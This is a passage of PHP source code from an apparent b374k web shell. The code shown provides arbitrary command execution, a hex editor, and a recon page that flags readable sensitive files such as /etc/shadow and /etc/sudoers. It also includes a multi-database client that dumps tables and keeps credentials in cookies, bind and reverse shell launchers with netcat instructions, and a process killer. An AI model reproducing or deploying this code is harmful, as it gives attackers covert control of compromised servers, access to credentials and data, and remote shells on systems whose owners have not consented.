        $s_result .= "<form action='".$s_self."' method='post'><p class='ce mp'><input type='text' class='inputz' style='width:100%;' name='hexedit' value='".hss($s_f)."' /></p><p class='bb' style='padding:0 0 14px 0;'><input type='submit' class='inputzbut' value='Save !' style='width:120px;height:30px;' onclick=\"return sh();\" /></p><table class='explore'>";

        if(@is_file($s_f)){
            $s_fp = fopen($s_f, "r");
            if($s_fp) {
                $s_ldump = "";
                $s_counter = 0;
                $s_icounter = 0;
                while(!feof($s_fp)){
                    $s_line = fread($s_fp, 32);
                    $s_linehex = strtoupper(bin2hex($s_line));
                    $s_linex = str_split($s_linehex, 2);
                    $s_linehex = implode(" ", $s_linex);
                    $s_addr = sprintf("%08xh", $s_icounter);

                    $s_result .= "<tr><td class='ce w60'>".$s_addr."</td><td class='le w594'><input onselect='this.selectionEnd=this.selectionStart;' onclick=\"hu('".$s_counter."',event);\" onkeydown=\"return hf('".$s_counter."',event);\" onkeyup=\"hu('".$s_counter."',event);\" type='text' class='inputz w578' id='hex_".$s_counter."' name='hx[]' value='".$s_linehex."'  maxlength='".strlen($s_linehex)."' /></td><td class='le ls2'><pre name='hexdump' id='dump_".$s_counter."' class='mp'></pre></td></tr>";
                    $s_counter++;
                    $s_icounter+=32;
                }
                $s_result .= "<input type='hidden' id='counter' value='".$s_counter."' />";
                $s_result .= "<textarea name='hxt' id='hxt' class='sembunyi'></textarea>";
                fclose($s_fp);
            }
        }
        $s_result .= "</table></form>";

    } // show server information
    elseif(isset($_GP['x']) && ($_GP['x']=='info')){
        $s_result = "";
        // server misc info
        $s_result .= "<p class='notif' onclick=\"toggle('info_server')\">Server Info</p>";
        $s_result .= "<div class='info' id='info_server'><table>";

        if($s_win){
            foreach (range("A", "Z") as $s_letter){
                if((@is_dir($s_letter.":\\") && @is_readable($s_letter.":\\"))){
                    $s_drive = $s_letter.":";
                    $s_result .= "<tr><td>drive ".$s_drive."</td><td>".ts(disk_free_space($s_drive))." free of ".ts(disk_total_space($s_drive))."</td></tr>";
                }
            }
        }
        else $s_result .= "<tr><td>root partition</td><td>".ts(@disk_free_space("/"))." free of ".ts(@disk_total_space("/"))."</td></tr>";

        $s_result .= "<tr><td>php</td><td>".phpversion()."</td></tr>";
        $s_access = array("s_python", "s_perl", "s_ruby", "s_node", "s_nodejs", "s_gcc", "s_java", "s_javac", "s_tar", "s_wget", "s_lwpdownload", "s_lynx", "s_curl");
        foreach($s_access as $s){
            $s_t = explode("_", $s);
            if(isset($$s)) $s_result .= "<tr><td>".$s_t[1]."</td><td>".$$s."</td></tr>";
        }

        if(!$s_win){
            $s_interesting = array(
            "/etc/os-release", "/etc/passwd", "/etc/shadow", "/etc/group", "/etc/issue", "/etc/issue.net", "/etc/motd", "/etc/sudoers", "/etc/hosts", "/etc/aliases",
            "/proc/version", "/etc/resolv.conf", "/etc/sysctl.conf",
            "/etc/named.conf", "/etc/network/interfaces", "/etc/squid/squid.conf", "/usr/local/squid/etc/squid.conf",
            "/etc/ssh/sshd_config",
            "/etc/httpd/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", " /etc/apache2/apache2.conf", "/etc/apache2/httpd.conf", "/usr/pkg/etc/httpd/httpd.conf", "/usr/local/etc/apache22/httpd.conf", "/usr/local/etc/apache2/httpd.conf", "/var/www/conf/httpd.conf", "/etc/apache2/httpd2.conf", "/etc/httpd/httpd.conf",
            "/etc/lighttpd/lighttpd.conf", "/etc/nginx/nginx.conf",
            "/etc/fstab", "/etc/mtab", "/etc/crontab", "/etc/inittab", "/etc/modules.conf", "/etc/modules");
            foreach($s_interesting as $s_f){
                if(@is_file($s_f) && @is_readable($s_f)) $s_result .= "<tr><td>".$s_f."</td><td><a href='".$s_self."view=".pl($s_f)."'>".$s_f." is readable</a></td></tr>";
            }
        }
        $s_result .= "</table></div>";

        if(!$s_win){
            // cpu info
            if($s_i_buff=trim(@fgc("/proc/cpuinfo"))){
                $s_result .= "<p class='notif' onclick=\"toggle('info_cpu')\">CPU Info</p>";
                $s_result .= "<div class='info' id='info_cpu'>";
                $s_i_buffs = explode("\n\n", $s_i_buff);
                foreach($s_i_buffs as $s_i_buffss){
                    $s_i_buffss = trim($s_i_buffss);
                    if($s_i_buffss!=""){
                        $s_i_buffsss = explode("\n", $s_i_buffss);
                        $s_result .= "<table>";
                        foreach($s_i_buffsss as $s_i){
                            $s_i = trim($s_i);
                            if($s_i!=""){
                                $s_ii = explode(":",$s_i);
                                if(count($s_ii)==2) $s_result .= "<tr><td>".$s_ii[0]."</td><td>".$s_ii[1]."</td></tr>";
                            }
                        }
                        $s_result .= "</table>";
                    }
                }
                $s_result .= "</div>";
            }

            // mem info
            if($s_i_buff=trim(@fgc("/proc/meminfo"))){
                $s_result .= "<p class='notif' onclick=\"toggle('info_mem')\">Memory Info</p>";
                $s_i_buffs = explode("\n", $s_i_buff);
                $s_result .= "<div class='info' id='info_mem'><table>";
                foreach($s_i_buffs as $s_i){
                    $s_i = trim($s_i);
                    if($s_i!=""){
                        $s_ii = explode(":",$s_i);
                        if(count($s_ii)==2) $s_result .= "<tr><td>".$s_ii[0]."</td><td>".$s_ii[1]."</td></tr>";
                    }
                    else $s_result .= "</table><table>";
                }
                $s_result .= "</table></div>";
            }

            // partition
            if($s_i_buff=trim(@fgc("/proc/partitions"))){
                $s_i_buff = preg_replace("/\ +/", " ", $s_i_buff);
                $s_result .= "<p class='notif' onclick=\"toggle('info_part')\">Partitions Info</p>";
                $s_result .= "<div class='info' id='info_part'>";
                $s_i_buffs = explode("\n\n", $s_i_buff);
                $s_result .= "<table><tr>";
                $s_i_head = explode(" ", $s_i_buffs[0]);
                foreach($s_i_head as $s_h) $s_result .= "<th>".$s_h."</th>";
                $s_result .= "</tr>";
                $s_i_buffss = explode("\n", $s_i_buffs[1]);
                foreach($s_i_buffss as $s_i_b){
                    $s_i_row = explode(" ", trim($s_i_b));
                    $s_result .= "<tr>";
                    foreach($s_i_row as $s_r) $s_result .= "<td style='text-align:center;'>".$s_r."</td>";
                    $s_result .= "</tr>";
                }
                $s_result .= "</table>";
                $s_result .= "</div>";
            }
        }
        $s_phpinfo = array("PHP General" => INFO_GENERAL, "PHP Configuration" => INFO_CONFIGURATION, "PHP Modules" => INFO_MODULES, "PHP Environment" => INFO_ENVIRONMENT, "PHP Variables" => INFO_VARIABLES);
        foreach($s_phpinfo as $s_p=>$s_i){
            $s_result .= "<p class='notif' onclick=\"toggle('".$s_i."')\">".$s_p."</p>";
            ob_start();
            eval("phpinfo(".$s_i.");");
            $s_b = ob_get_contents();
            ob_end_clean();
            if(preg_match("/<body>(.*?)<\/body>/is", $s_b, $r)){
                $s_body = str_replace(array(",", ";", "&amp;"), array(", ", "; ", "&"), $r[1]);
                $s_result .= "<div class='info' id='".$s_i."'>".$s_body."</div>";
            }
        }
    } // working with database
    elseif(isset($_GP['x']) && ($_GP['x']=='db')){
        // sqltype : mysql, mssql, oracle, pgsql, sqlite, sqlite3, odbc, pdo
        $s_sql = array();
        $s_sql_deleted = "";
        $s_show_form = $s_show_dbs = true;

        if(isset($_GP['dc'])){
            $k = $_GP['dc'];
            setcookie("c[".$k."]", "" ,time() - $s_login_time);
            $s_sql_deleted = $k;
        }

        if(isset($_COOKIE['c']) && !isset($_GP['connect'])){
            foreach($_COOKIE['c'] as $c=>$d){
                if($c==$s_sql_deleted) continue;
                $s_dbcon = (function_exists("json_encode") && function_exists("json_decode"))? json_decode($d):unserialize($d);
                foreach($s_dbcon as $k=>$v) $s_sql[$k] = $v;
                $s_sqlport = (!empty($s_sql['port']))? ":".$s_sql['port']:"";
                $s_result .= notif("[".$s_sql['type']."] ".$s_sql['user']."@".$s_sql['host'].$s_sqlport."
                            <span style='float:right;'><a href='".$s_self."x=db&connect=connect&sqlhost=".pl($s_sql['host'])."&sqlport=".pl($s_sql['port'])."&sqluser=".pl($s_sql['user'])."&sqlpass=".pl($s_sql['pass'])."&sqltype=".pl($s_sql['type'])."'>connect</a> | <a href='".$s_self."x=db&dc=".pl($c)."'>disconnect</a></span>");
            }
        }
        else{
            $s_sql['host'] = isset($_GP['sqlhost'])? $_GP['sqlhost'] : "";
            $s_sql['port'] = isset($_GP['sqlport'])? $_GP['sqlport'] : "";
            $s_sql['user'] = isset($_GP['sqluser'])? $_GP['sqluser'] : "";
            $s_sql['pass'] = isset($_GP['sqlpass'])? $_GP['sqlpass'] : "";
            $s_sql['type'] = isset($_GP['sqltype'])? $_GP['sqltype'] : "";
        }

        if(isset($_GP['connect'])){
            $s_con = sql_connect($s_sql['type'],$s_sql['host'],$s_sql['user'],$s_sql['pass']);
            $s_sqlcode = isset($_GP['sqlcode'])? $_GP['sqlcode'] : "";

            if($s_con!==false){
                if(isset($_GP['sqlinit'])){
                    $s_sql_cookie = (function_exists("json_encode") && function_exists("json_decode"))? json_encode($s_sql):serialize($s_sql);
                    $s_c_num = substr(md5(time().rand(0,100)),0,3);
                    while(isset($_COOKIE['c']) && is_array($_COOKIE['c']) && array_key_exists($s_c_num, $_COOKIE['c'])){
                        $s_c_num = substr(md5(time().rand(0,100)),0,3);
                    }
                    setcookie("c[".$s_c_num."]", $s_sql_cookie ,time() + $s_login_time);
                }
                $s_show_form = false;
                $s_result .= "<form action='".$s_self."' method='post'>
                    <input type='hidden' name='sqlhost' value='".hss($s_sql['host'])."' />
                    <input type='hidden' name='sqlport' value='".hss($s_sql['port'])."' />
                    <input type='hidden' name='sqluser' value='".hss($s_sql['user'])."' />
                    <input type='hidden' name='sqlpass' value='".hss($s_sql['pass'])."' />
                    <input type='hidden' name='sqltype' value='".hss($s_sql['type'])."' />
                    <input type='hidden' name='x' value='db' />
                    <input type='hidden' name='connect' value='connect' />
                    <textarea id='sqlcode' name='sqlcode' class='txtarea' style='height:150px;'>".hss($s_sqlcode)."</textarea>
                    <p><input type='submit' name='gogo' class='inputzbut' value='Go !' style='width:120px;height:30px;' />
                    &nbsp;&nbsp;Separate multiple commands with a semicolon  <span class='gaya'>[</span> ; <span class='gaya'>]</span></p>
                    </form>";

                if(!empty($s_sqlcode)){
                    $s_querys = explode(";",$s_sqlcode);
                    foreach($s_querys as $s_query){
                        if(trim($s_query) != ""){
                            $s_hasil = sql_query($s_sql['type'],$s_query,$s_con);
                            if($s_hasil!=false){
                                $s_result .= "<hr /><p style='padding:0;margin:6px 10px;font-weight:bold;'>".hss($s_query).";&nbsp;&nbsp;&nbsp;
                                <span class='gaya'>[</span> ok <span class='gaya'>]</span></p>";

                                if(!is_bool($s_hasil)){
                                    $s_result .= "<table class='explore sortable' style='width:100%;'><tr>";
                                    for($s_i = 0; $s_i<sql_num_fields($s_sql['type'],$s_hasil); $s_i++)
                                        $s_result .= "<th>".@hss(sql_field_name($s_sql['type'],$s_hasil,$s_i))."</th>";
                                    $s_result .= "</tr>";
                                    while($s_rows=sql_fetch_data($s_sql['type'],$s_hasil)){
                                        $s_result .= "<tr>";
                                        foreach($s_rows as $s_r){
                                            if(empty($s_r)) $s_r = " ";
                                            $s_result .= "<td>".@hss($s_r)."</td>";
                                        }
                                        $s_result .= "</tr>";
                                    }
                                    $s_result .= "</table>";
                                }
                            }
                            else{
                                $s_result .= "<p style='padding:0;margin:6px 10px;font-weight:bold;'>".hss($s_query).";&nbsp;&nbsp;&nbsp;<span class='gaya'>[</span> error <span class='gaya'>]</span></p>";
                            }
                        }
                    }
                }
                else{
                    if(($s_sql['type']!='pdo') && ($s_sql['type']!='odbc')){
                        if($s_sql['type']=='mysql') $s_showdb = "SHOW DATABASES";
                        elseif($s_sql['type']=='mssql') $s_showdb = "SELECT name FROM master..sysdatabases";
                        elseif($s_sql['type']=='pgsql') $s_showdb = "SELECT schema_name FROM information_schema.schemata";
                        elseif($s_sql['type']=='oracle') $s_showdb = "SELECT USERNAME FROM SYS.ALL_USERS ORDER BY USERNAME";
                        elseif($s_sql['type']=='sqlite3' || $s_sql['type']=='sqlite') $s_showdb = "SELECT \"".$s_sql['host']."\"";
                        else $s_showdb = "SHOW DATABASES";

                        $s_hasil = sql_query($s_sql['type'],$s_showdb,$s_con);

                        if($s_hasil!=false) {
                            while($s_rows_arr=sql_fetch_data($s_sql['type'],$s_hasil)){
                                foreach($s_rows_arr as $s_rows){
                                    $s_result .= "<p class='notif' onclick=\"toggle('db_".$s_rows."')\">".$s_rows."</p>";
                                    $s_result .= "<div class='info' id='db_".$s_rows."'><table class='explore'>";

                                    if($s_sql['type']=='mysql') $s_showtbl = "SHOW TABLES FROM ".$s_rows;
                                    elseif($s_sql['type']=='mssql') $s_showtbl = "SELECT name FROM ".$s_rows."..sysobjects WHERE xtype = 'U'";
                                    elseif($s_sql['type']=='pgsql') $s_showtbl = "SELECT table_name FROM information_schema.tables WHERE table_schema='".$s_rows."'";
                                    elseif($s_sql['type']=='oracle') $s_showtbl = "SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='".$s_rows."'";
                                    elseif($s_sql['type']=='sqlite3' || $s_sql['type']=='sqlite') $s_showtbl = "SELECT name FROM sqlite_master WHERE type='table'";
                                    else $s_showtbl = "";

                                    $s_hasil_t = sql_query($s_sql['type'],$s_showtbl,$s_con);
                                    if($s_hasil_t!=false) {
                                        while($s_tables_arr=sql_fetch_data($s_sql['type'],$s_hasil_t)){
                                            foreach($s_tables_arr as $s_tables){
                                                if($s_sql['type']=='mysql') $s_dump_tbl = "SELECT * FROM ".$s_rows.".".$s_tables." LIMIT 0,100";
                                                elseif($s_sql['type']=='mssql') $s_dump_tbl = "SELECT TOP 100 * FROM ".$s_rows."..".$s_tables;
                                                elseif($s_sql['type']=='pgsql') $s_dump_tbl = "SELECT * FROM ".$s_rows.".".$s_tables." LIMIT 100 OFFSET 0";
                                                elseif($s_sql['type']=='oracle') $s_dump_tbl = "SELECT * FROM ".$s_rows.".".$s_tables." WHERE ROWNUM BETWEEN 0 AND 100;";
                                                elseif($s_sql['type']=='sqlite' || $s_sql['type']=='sqlite3') $s_dump_tbl = "SELECT * FROM ".$s_tables." LIMIT 0,100";
                                                else $s_dump_tbl = "";

                                                $s_dump_tbl_link = $s_self."x=db&connect=&sqlhost=".pl($s_sql['host'])."&sqlport=".pl($s_sql['port'])."&sqluser=".pl($s_sql['user'])."&sqlpass=".pl($s_sql['pass'])."&sqltype=".pl($s_sql['type'])."&sqlcode=".pl($s_dump_tbl);

                                                $s_result .= "<tr><td ondblclick=\"return go('".adds($s_dump_tbl_link)."',event);\"><a href='".$s_dump_tbl_link."'>".$s_tables."</a></td></tr>";
                                            }
                                        }
                                    }
                                    $s_result .= "</table></div>";
                                }
                            }
                        }
                    }
                }
                sql_close($s_sql['type'],$s_con);
            }
            else{
                $s_result .= notif("Unable to connect to database");
                $s_show_form = true;
            }
        }

        if($s_show_form){
            // sqltype : mysql, mssql, oracle, pgsql, sqlite, sqlite3, odbc, pdo
            $s_sqllist = array();
            if(function_exists("mysql_connect")) $s_sqllist["mysql"] = "Connect to MySQL <span class='desc' style='font-size:12px;'>- using class mysqli or mysql_*</span>";
            if(function_exists("mssql_connect") || function_exists("sqlsrv_connect")) $s_sqllist["mssql"] = "Connect to MsSQL <span class='desc' style='font-size:12px;'>- using sqlsrv_* or mssql_*</span>";
            if(function_exists("pg_connect")) $s_sqllist["pgsql"] = "Connect to PostgreSQL <span class='desc' style='font-size:12px;'>- using pg_*</span>";
            if(function_exists("oci_connect")) $s_sqllist["oracle"] = "Connect to oracle <span class='desc' style='font-size:12px;'>- using oci_*</span>";
            if(function_exists("sqlite_open")) $s_sqllist["sqlite"] = "Connect to SQLite <span class='desc' style='font-size:12px;'>- using sqlite_*</span>";
            if(class_exists("SQLite3")) $s_sqllist["sqlite3"] = "Connect to SQLite3 <span class='desc' style='font-size:12px;'>- using class SQLite3</span>";
            if(function_exists("odbc_connect")) $s_sqllist["odbc"] = "Connect via ODBC <span class='desc' style='font-size:12px;'>- using odbc_*</span>";
            if(class_exists("PDO")) $s_sqllist["pdo"] = "Connect via PDO <span class='desc' style='font-size:12px;'>- using class PDO</span>";

            foreach($s_sqllist as $s_sql['type']=>$s_sqltitle){
                if($s_sql['type']=="odbc" || $s_sql['type']=="pdo"){
                    $s_result .= "<div class='mybox'><h2>".$s_sqltitle."</h2>
                    <form action='".$s_self."' method='post' />
                    <table class='myboxtbl'>
                    <tr><td style='width:170px;'>DSN / Connection String</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>
                    <tr><td>Username</td><td><input style='width:100%;' class='inputz' type='text' name='sqluser' value='' /></td></tr>
                    <tr><td>Password</td><td><input style='width:100%;' class='inputz' type='password' name='sqlpass' value='' /></td></tr>
                    </table>
                    <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
                    <input type='hidden' name='sqltype' value='".$s_sql['type']."' />
                    <input type='hidden' name='sqlinit' value='init' />
                    <input type='hidden' name='x' value='db' />
                    </form>
                    </div>";
                }
                elseif($s_sql['type']=="sqlite" || $s_sql['type']=="sqlite3"){
                    $s_result .= "<div class='mybox'><h2>".$s_sqltitle."</h2>
                    <form action='".$s_self."' method='post' />
                    <table class='myboxtbl'>
                    <tr><td style='width:170px;'>DB File</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>
                    </table>
                    <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
                    <input type='hidden' name='sqltype' value='".$s_sql['type']."' />
                    <input type='hidden' name='sqlinit' value='init' />
                    <input type='hidden' name='x' value='db' />
                    </form>
                    </div>";
                }
                else{
                    $s_result .= "<div class='mybox'><h2>".$s_sqltitle."</h2>
                    <form action='".$s_self."' method='post' />
                    <table class='myboxtbl'>
                    <tr><td style='width:170px;'>Host</td><td><input style='width:100%;' class='inputz' type='text' name='sqlhost' value='' /></td></tr>
                    <tr><td>Username</td><td><input style='width:100%;' class='inputz' type='text' name='sqluser' value='' /></td></tr>
                    <tr><td>Password</td><td><input style='width:100%;' class='inputz' type='password' name='sqlpass' value='' /></td></tr>
                    <tr><td>Port (optional)</td><td><input style='width:100%;' class='inputz' type='text' name='sqlport' value='' /></td></tr>
                    </table>
                    <input type='submit' name='connect' class='inputzbut' value='Connect !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
                    <input type='hidden' name='sqltype' value='".$s_sql['type']."' />
                    <input type='hidden' name='sqlinit' value='init' />
                    <input type='hidden' name='x' value='db' />
                    </form>
                    </div>";
                }
            }
        }
    } // bind and reverse shell
    elseif(isset($_GP['x']) && ($_GP['x']=='rs')){
        // resources $s_rs_pl $s_rs_py $s_rs_rb $s_rs_js $s_rs_c $s_rs_java $s_rs_java $s_rs_win $s_rs_php
        $s_rshost = $s_server_ip;

        $s_rsport = "13123"; // default port
        $s_rspesana = "Press &#39;  Go !  &#39; button and run &#39;  nc <i>server_ip</i> <i>port</i>  &#39; on your computer";
        $s_rspesanb = "Run &#39;  nc -l -v -p <i>port</i>  &#39; on your computer and press &#39;  Go !  &#39; button";
        $s_rs_err = "";

        $s_rsbind = $s_rsback = array();

        $s_rsbind["bind_php"] = "Bind Shell <span class='desc' style='font-size:12px;'>- php</span>";
        $s_rsback["back_php"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- php</span>";

        $s_access = array("s_python"=>"py", "s_perl"=>"pl", "s_ruby"=>"rb", "s_node"=>"js", "s_nodejs"=>"js", "s_gcc"=>"c", "s_javac"=>"java");
        foreach($s_access as $k=>$v){
            if(isset($$k)){
                $s_t = explode("_", $k);
                $s_rsbind["bind_".$v] = "Bind Shell <span class='desc' style='font-size:12px;'>- ".$s_t[1]."</span>";
                $s_rsback["back_".$v] = "Reverse Shell <span class='desc' style='font-size:12px;'>- ".$s_t[1]."</span>";
            }
        }

        if($s_win){
            $s_rsbind["bind_win"] = "Bind Shell <span class='desc' style='font-size:12px;'>- windows executable</span>";
            $s_rsback["back_win"] = "Reverse Shell <span class='desc' style='font-size:12px;'>- windows executable</span>";
        }
        $s_rslist = array_merge($s_rsbind,$s_rsback);

        if(!@is_writable($s_cwd)) $s_result .= notif("Directory ".$s_cwd." is not writable, please change to a writable one");

        foreach($s_rslist as $s_rstype=>$s_rstitle){
            $s_split = explode("_",$s_rstype);
            if($s_split[0]=="bind"){
                $s_rspesan = $s_rspesana;
                $s_rsdisabled = "disabled='disabled'";
                $s_rstarget = $s_server_ip;
                $s_labelip = "Server IP";
            }
            elseif($s_split[0]=="back"){
                $s_rspesan = $s_rspesanb;
                $s_rsdisabled = "";
                $s_rstarget = $s_my_ip;
                $s_labelip = "Target IP";
            }

            if(isset($_GP[$s_rstype])){
                if(isset($_GP["rshost_".$s_rstype])) $s_rshost_ = $_GP["rshost_".$s_rstype];
                if(isset($_GP["rsport_".$s_rstype])) $s_rsport_ = $_GP["rsport_".$s_rstype];

                if($s_split[0]=="bind") $s_rstarget_packed = $s_rsport_;
                elseif($s_split[0]=="back") $s_rstarget_packed = $s_rsport_." ".$s_rshost_;

                if($s_split[1]=="pl") $s_rscode = $s_rs_pl;
                elseif($s_split[1]=="py") $s_rscode = $s_rs_py;
                elseif($s_split[1]=="rb") $s_rscode = $s_rs_rb;
                elseif($s_split[1]=="js") $s_rscode = $s_rs_js;
                elseif($s_split[1]=="c") $s_rscode = $s_rs_c;
                elseif($s_split[1]=="java") $s_rscode = $s_rs_java;
                elseif($s_split[1]=="win") $s_rscode = $s_rs_win;
                elseif($s_split[1]=="php") $s_rscode = $s_rs_php;

                $s_buff = rs($s_rstype,$s_rstarget_packed,$s_rscode);
                if($s_buff!="") $s_rs_err = notif(hss($s_buff));
            }
            $s_result .= "<div class='mybox'><h2>".$s_rstitle."</h2>
            <form action='".$s_self."' method='post' />
            <table class='myboxtbl'>
            <tr><td style='width:100px;'>".$s_labelip."</td><td><input ".$s_rsdisabled." style='width:100%;' class='inputz' type='text' name='rshost_".$s_rstype."' value='".hss($s_rstarget)."' /></td></tr>
            <tr><td>Port</td><td><input style='width:100%;' class='inputz' type='text' name='rsport_".$s_rstype."' value='".hss($s_rsport)."' /></td></tr>
            </table>
            <input type='submit' name='".$s_rstype."' class='inputzbut' value='Go !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
            &nbsp;&nbsp;<span>".$s_rspesan."</span>
            <input type='hidden' name='x' value='rs' />
            </form>
            </div>";
        }

        $s_result = $s_rs_err.$s_result;
    } // task manager
    elseif(isset($_GP['x']) && ($_GP['x']=='ps')){
        $s_buff = "";
        // kill process specified by pid
        if(isset($_GP['pid'])){
            $s_p = trim($_GP['pid'],"|");
            $s_parr = explode("|", $s_p);

            foreach($s_parr as $s_p){
                if(function_exists("posix_kill")) $s_buff .= (posix_kill($s_p,'9'))? notif("Process with pid ".$s_p." has been successfully killed"):notif("Unable to kill process with pid ".$s_p);
                else{
                    if(!$s_win) $s_buff .= notif(exe("kill -9 ".$s_p));
                    else $s_buff .= notif(exe("taskkill /F /PID ".$s_p));
                }
            }
        }

        if(!$s_win) $s_h = "ps aux"; // nix
        else $s_h = "tasklist /V /FO csv"; // win
        $s_wcount = 11;
        $s_wexplode = " ";
        if($s_win) $s_wexplode = "\",\"";

        $s_res = exe($s_h);
        if(trim($s_res)=='') $s_result = notif("Error getting process list");
        else{
            if($s_buff!="") $s_result = $s_buff;
            $s_result .= "<table class='explore sortable'>";
            if(!$s_win) $s_res = preg_replace('#\ +#',' ',$s_res);

            $s_psarr = explode("\n",$s_res);
            $s_fi = true;
            $s_tblcount = 0;

            $s_check = explode($s_wexplode,$s_psarr[0]);
            $s_wcount = count($s_check);

            foreach($s_psarr as $s_psa){
                if(trim($s_psa)!=''){
                    if($s_fi){
                        $s_fi = false;
                        $s_psln = explode($s_wexplode, $s_psa, $s_wcount);
                        $s_result .= "<tr><th style='width:24px;' class='sorttable_nosort'></th><th class='sorttable_nosort'>action</th>";
                        foreach($s_psln as $s_p) $s_result .= "<th>".trim(trim(strtolower($s_p)) ,"\"")."</th>";
                        $s_result .= "</tr>";
                    }
                    else{
                        $s_psln = explode($s_wexplode, $s_psa, $s_wcount);
                        $s_result .= "<tr>";
                        $s_tblcount = 0;
                        foreach($s_psln as $s_p){
                            $s_pid = trim(trim($s_psln[1]),"\"");
                            $s_piduniq = substr(md5($s_pid),0,8);
                            if(trim($s_p)=="") $s_p = "&nbsp;";
                            if($s_tblcount == 0){
                                $s_result .= "<td style='text-align:center;text-indent:4px;'><input id='".$s_piduniq."' name='cbox' value='".$s_pid."' type='checkbox' class='css-checkbox' onchange='hilite(this);' /><label for='".$s_piduniq."' class='css-label'></label></td><td class='ce'><a href='".$s_self."x=ps&pid=".$s_pid."'>kill</a></td><td class='ce'>".trim(trim($s_p) ,"\"")."</td>";
                                $s_tblcount++;
                            }
                            else{
                                $s_tblcount++;
                                if($s_tblcount == count($s_psln)) $s_result .= "<td class='le'>".trim(trim($s_p) ,"\"")."</td>";
                                else $s_result .= "<td class='ce'>".trim(trim($s_p) ,"\"")."</td>";
                            }
                        }
                        $s_result .= "</tr>";
                    }
                }
            }
            $colspan = count($s_psln)+1;
            $s_result .= "<tfoot><tr class='cbox_selected'><td class='cbox_all'>
            <form action='".$s_self."' method='post'><input id='checkalll' type='checkbox' name='abox' class='css-checkbox' onclick='checkall();' /><label for='checkalll' class='css-label'></label></form>
            </td><td style='text-indent:10px;padding:2px;' colspan=".$colspan."><a href='javascript: pkill();'>kill selected <span id='total_selected'></span></a></td>
            </tr></tfoot></table>";
        }
    }
    elseif(isset($_GP['x']) && ($_GP['x']=='pass')){
        if(isset($_GP['submitnewpass'])){
            $newpass = isset($_GP['newpass'])? trim($_GP['newpass']):"";
            $newpassx = isset($_GP['newpassx'])? trim($_GP['newpassx']):"";
            
            if(empty($newpass) || empty($newpassx)){
                $s_result .= notif('Give your new password to both fields');
            }
            elseif($newpass != $newpassx){
                $s_result .= notif('Password does not match');
            }
            else{
                if(changepass($newpass)){
                    $s_result .= notif("Password changed");
                }
                else $s_result .= notif("Unable to change password");
            }
        }
        
        
        $s_result .= "<div class='mybox'><h2>Change shell password</h2>
            <form action='".$s_self."' method='post' />
            <table class='myboxtbl'>
            <tr><td style='width:120px;'>New password</td><td><input style='width:100%;' class='inputz' type='password' name='newpass' value='' /></td></tr>
            <tr><td style='width:120px;'>Confirm password</td><td><input style='width:100%;' class='inputz' type='password' name='newpassx' value='' /></td></tr>
            </table>
            <input type='submit' name='submitnewpass' class='inputzbut' value='Go !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />
            <input type='hidden' name='x' value='pass' />
            </form>
            </div>";
    }
    else{
        if(!isset($s_cwd)) $s_cwd = "";
        if(isset($_GP['cmd'])){
            $s_cmd = $_GP['cmd'];
            if(strlen($s_cmd) > 0){
                if(preg_match('#^cd(\ )+(.*)#',$s_cmd,$s_r)){
                    $s_nd = trim($s_r[2]);
                    if(@is_dir($s_nd)){
                        chdir($s_nd);
                        $s_cwd = cp(getcwd());
                        setcookie("cwd", $s_cwd ,time() + $s_login_time);
                        $s_result .= showdir($s_cwd);
                    }
                    elseif(@is_dir($s_cwd.$s_nd)){
                        chdir($s_cwd.$s_nd);
                        $s_cwd = cp(getcwd());
                        setcookie("cwd", $s_cwd ,time() + $s_login_time);
                        $s_result .= showdir($s_cwd);
                    }
                    else $s_result .= notif(hss($s_nd)." is not a directory");
                }
                else{
                    $s_r = hss(exe($s_cmd));
                    if($s_r != '') $s_result .= "<pre>".$s_r."</pre>";
                    else $s_result .= showdir($s_cwd);
                }
            }
            else $s_result .= showdir($s_cwd);
        }
        else $s_result .= showdir($s_cwd);
    }

    // find drive letters
    $s_letters = '';
    $s_v = explode("\\",$s_cwd);
    $s_v = $s_v[0];
    foreach (range("A", "Z") as $s_letter){
        if(@is_readable($s_letter.":\\")){
            $s_letters .= "<a href='".$s_self."cd=".$s_letter.":\\'>[ ";
            if($s_letter.":" != $s_v) $s_letters .= $s_letter;
            else{$s_letters .= "<span class='drive-letter'>".$s_letter."</span>";}
            $s_letters .= " ]</a> ";
        }
    }

    // print useful info
    $s_info  = "<table class='headtbl'><tr><td>".$s_system."</td></tr>";
    $s_info .= "<tr><td>".$s_software."</td></tr>";
    $s_info .= "<tr><td>server ip : ".$s_server_ip."<span class='gaya'> | </span>your   ip : ".$s_my_ip;
    $s_info .= "<span class='gaya'> | </span> Time @ Server : ".@date("d M Y H:i:s",time());
    $s_info .= "</td></tr>
            <tr><td style='text-align:left;'>
                <table class='headtbls'><tr>
                <td>".trim($s_letters)."</td>
                <td>
                <span id='chpwd'>
                &nbsp;<a href=\"javascript:tukar_('chpwd','chpwdform')\">
                <span class='icon'>o</span>
                &nbsp;&nbsp;</a>".swd($s_cwd)."</span>
                <form action='".$s_self."' method='post' style='margin:0;padding:0;'>
                <span class='sembunyi' id='chpwdform'>
                &nbsp;<a href=\"javascript:tukar_('chpwdform','chpwd');\">
                <span class='icon'>o</span>
                </a>&nbsp;&nbsp;
                <input type='text' name='view' class='inputz' style='width:300px;' value='".hss($s_cwd)."' />
                <input class='inputzbut' type='submit' name='submit' value='view file / folder' />
                </span>
                </form>
                </td></tr>
                </table>
            </td></tr>
            </table>";
}

$s_error = @ob_get_contents();
$s_result = isset($s_result)? $s_result:"";
if(!empty($s_error)) $s_result = notif($s_error).$s_result;
@ob_end_clean();
@ob_start();

?><!DOCTYPE html>
<html>
<head>
<title><?php echo $s_title; ?></title>
<meta charset="utf-8">
<meta name='robots' content='noindex, nofollow, noarchive'>
<link rel='SHORTCUT ICON' href='<?php echo $s_favicon; ?>'>
<?php echo get_code("css", $s_css); ?>
</head>
<body>
<table id='main'><tr><td>
<?php if($s_auth){?>
    <div><span style='float:right;'><?php
    if(!isset($_COOKIE['b374k_included'])){
